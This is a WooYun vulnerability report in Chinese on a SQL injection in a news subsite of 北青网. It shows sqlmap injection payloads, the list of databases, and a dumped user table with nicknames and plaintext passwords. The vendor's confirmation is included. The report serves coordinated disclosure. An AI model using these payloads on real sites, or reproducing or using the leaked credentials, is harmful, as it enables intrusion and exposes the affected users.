当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158102

漏洞标题:北青网另一处分站存在SQL注入

相关厂商:北青网

漏洞作者: 西西

提交时间:2015-12-05 01:10

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

北青网另一处分站存在SQL注入

详细说明:

北青网另一处分站存在SQL注入

漏洞证明:

参考
http://**.**.**.**/bugs/wooyun-2010-0146878
注入点
http://**.**.**.**/cgi/news.php?id=535910
数据跟他跑的都一样
如下

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=535910 AND 3090=3090
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=535910 AND (SELECT 8509 FROM(SELECT COUNT(*),CONCAT(0x3a6a776e3a
,(SELECT (CASE WHEN (8509=8509) THEN 1 ELSE 0 END)),0x3a746e793a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=535910 AND SLEEP(5)
---
[21:16:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[21:16:57] [INFO] fetching database names
[21:16:57] [INFO] the SQL query used returns 3 entries
[21:16:57] [INFO] resumed: information_schema
[21:16:57] [INFO] resumed: foodbq
[21:16:57] [INFO] resumed: web_2_1
available databases [3]:
[*] foodbq
[*] information_schema
[*] web_2_1


dumpweb_2_1中一个表

Database: web_2_1
Table: user
[15 entries]
+------+-------+-------+----------------+---------+----------------------+------
--+----------------+---------+-----------+---------------------+----------------
-----+
| d_id | mu_id | cu_id | nick           | url_1   | email                | mende
r | passwd         | creator | published | savedatetime        | createdatetime
     |
+------+-------+-------+----------------+---------+----------------------+------
--+----------------+---------+-----------+---------------------+----------------
-----+
| 1    | 1     | 1     | xinshou2008    | <blank> | xinshou_2008@**.**.**.**  | NULL
  | 111111         | admin   | y         | 2013-10-12 14:29:23 | 2013-10-12 11:4
6:43 |
| 2    | NULL  | 1     | xinshou        | NULL    | xinshou_2009@**.**.**.**  | NULL
  | 111111         | admin   | n         | NULL                | 2013-10-12 12:0
1:35 |
| 3    | NULL  | 1     | ?              | NULL    | 1180486@**.**.**.**       | NULL
  | 111111         | admin   | n         | NULL                | 2013-10-14 20:3
5:06 |
| 4    | NULL  | 1     | Shawn          | NULL    | yipeng.gnu@**.**.**.** | NULL
  | 123456         | admin   | n         | NULL                | 2013-10-15 18:1
7:06 |
| 5    | NULL  | 1     | hzzsbbs8458426 | NULL    | hzzsbbs1990          | NULL
  | hzzsbbs8458426 | admin   | n         | NULL                | 2013-11-12 23:2
5:49 |
| 6    | NULL  | 1     | asdfg2012      | NULL    | ????989              | NULL
  | asdfg2012      | admin   | n         | NULL                | 2013-11-13 06:0
3:06 |
| 7    | NULL  | 1     | qbotqb817      | NULL    | pzfb9pNc             | NULL
  | qbotqb817      | admin   | n         | NULL                | 2013-11-13 15:4
2:06 |
| 8    | NULL  | 1     | zxczxc         | NULL    | jdgvbz163            | NULL
  | zxczxc         | admin   | n         | NULL                | 2013-11-13 23:4
8:40 |
| 9    | NULL  | 1     | /              | NULL    | /                    | NULL
  | /              | admin   | n         | NULL                | 2013-11-14 15:1
4:53 |
| 10   | NULL  | 1     | lilianghai     | NULL    | lilianghai           | NULL
  | lilianghai     | admin   | n         | NULL                | 2013-11-16 23:0
0:33 |
| 11   | NULL  | 1     | 678878         | NULL    | weiquan007           | NULL
  | 678878         | admin   | n         | NULL                | 2013-11-17 12:1
7:19 |
| 12   | NULL  | 1     | abc123         | NULL    | woshinindaye0003     | NULL
  | abc123         | admin   | n         | NULL                | 2013-11-18 04:4
6:32 |
| 13   | NULL  | 1     | rixhug180      | NULL    | xpup4qIb             | NULL
  | rixhug180      | admin   | n         | NULL                | 2013-11-18 18:3
7:53 |
| 14   | NULL  | 1     | bzqimc851      | NULL    | mzcu0nMf             | NULL
  | bzqimc851      | admin   | n         | NULL                | 2013-11-19 09:0
2:49 |
| 15   | NULL  | 1     | ewshke990      | NULL    | oylm7xKd             | NULL
  | ewshke990      | admin   | n         | NULL                | 2013-11-20 05:5
1:45 |
+------+-------+-------+----------------+---------+----------------------+------
--+----------------+---------+-----------+---------------------+----------------
-----+


没跑完 仅证明
------The End------

修复方案:

不会

版权声明:转载请注明来源 西西@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-09 18:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无